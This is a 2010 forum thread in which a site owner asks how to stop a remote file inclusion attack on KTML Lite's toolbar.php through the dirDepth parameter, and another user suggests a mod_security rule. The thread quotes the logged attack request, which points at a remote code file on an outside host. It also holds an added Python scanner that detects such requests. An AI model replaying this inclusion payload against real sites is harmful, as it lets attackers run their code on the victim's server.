
toolbar.php and index.php dirDepth - hostile injection

Posted: 2010-07-15 17:11
by glensbo
Have any of you seen any solution to this problem:
The problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if you are able to place phishing code via the two files in ktml.
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html

Could anybody help in finding ways around this security problem?
Regards Henri

Re: toolbar.php and index.php dirDepth - hostile injection

Posted: 2010-07-16 20:38
by Fred
Hi Henri,
Haven't used ktml lite in ages so I can't really comment on it.
How about asking your host to set a mod_sec rule to check for the problem and block it when it happens.
I am sure (might be totally wrong) that the toolbar.php file will never be used with a http parameter so it should be easy enough to check for such an event.
If it is used with a http parameter, you can check that the domain is the same as where the script is running from. You will definitely not include a file from a remote domain in that manner.

Coding mod_sec rules is not my forte so it will be best to ask your host for assistance.

Re: toolbar.php and index.php dirDepth - hostile injection

Posted: 2010-07-24 15:45
by glensbo
Thanks for your reply. I will delete the two files, and see if it has any effect.

Re: toolbar.php and index.php dirDepth - hostile injection

Posted: 2010-07-26 17:28
by Fred
What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
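One way to find such requests in the access log before (or alongside) writing the mod_sec rule, as an added example that is not part of this thread: it flags any dirDepth value on the two ktedit scripts that points at a host other than your own or uses a PHP stream wrapper. The local host names and the log lines are constructed from the redacted example above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hosts this installation legitimately runs on (assumed, from the thread's
# redacted "www.xxxx.xx"; replace with your own vhost names).
LOCAL_HOSTS = {"www.xxxx.xx", "xxxx.xx"}

# Schemes that make PHP include()/require() fetch or synthesise code
# instead of reading a file under the document root.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "expect", "phar"}

# Apache "combined" log format; the request target carries the query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_remote_include(value: str) -> bool:
    """True if a dirDepth value would pull code from outside the local tree."""
    v = unquote(value).strip().rstrip("?")   # attackers append "?" to swallow the rest of the path
    parts = urlsplit(v)
    scheme = parts.scheme.lower()
    if scheme in ("http", "https"):
        return parts.hostname not in LOCAL_HOSTS   # remote host = remote file inclusion
    if scheme in REMOTE_SCHEMES:
        return True                                # php://, data:, expect:, phar:, ftp://
    return v.startswith("//")                      # scheme-relative URL still resolves remotely

def scan_access_log(lines):
    """Return (client_ip, dirDepth_value) for requests that attempt a remote include."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith(("/ktedit/toolbar.php", "/ktedit/index.php")):
            continue
        for value in parse_qs(query, keep_blank_values=True).get("dirDepth", []):
            if is_remote_include(value):
                hits.append((m.group("ip"), value))
    return hits

# Constructed sample log lines: one attack (host h1.ripway.com, as in the thread),
# one harmless relative value, one value on our own host, one unrelated script.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2010:17:02:11 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [15/Jul/2010:17:03:40 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=../../ HTTP/1.1" 200 11213 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jul/2010:17:04:02 +0200] "GET /ktmlliterf/includes/ktedit/index.php?dirDepth=http://www.xxxx.xx/ktmlliterf/includes/ HTTP/1.1" 200 3201 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jul/2010:17:05:02 +0200] "GET /index.php?dirDepth=http://h1.ripway.com/x.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan_access_log(SAMPLE_LOG):
        print(f"remote include attempt from {ip}: dirDepth={value}")
```

The IPs this reports are the ones a mod_sec or firewall rule would then block; the same `is_remote_include` test is what the rule itself has to express on the dirDepth argument.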

Re: toolbar.php and index.php dirDepth - hostile injection

Posted: 2010-08-27 10:36
by glensbo
Fred wrote: What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
Thanks for your help, as it was what I experienced, so I will write the workaround as you have outlined. Thanks again.

Re: toolbar.php and index.php dirDepth - hostile injection

Posted: 2010-08-27 11:17
by Fred
Glad you solved your problem.

Could you post the rule that you created?
It might be useful for someone else as well.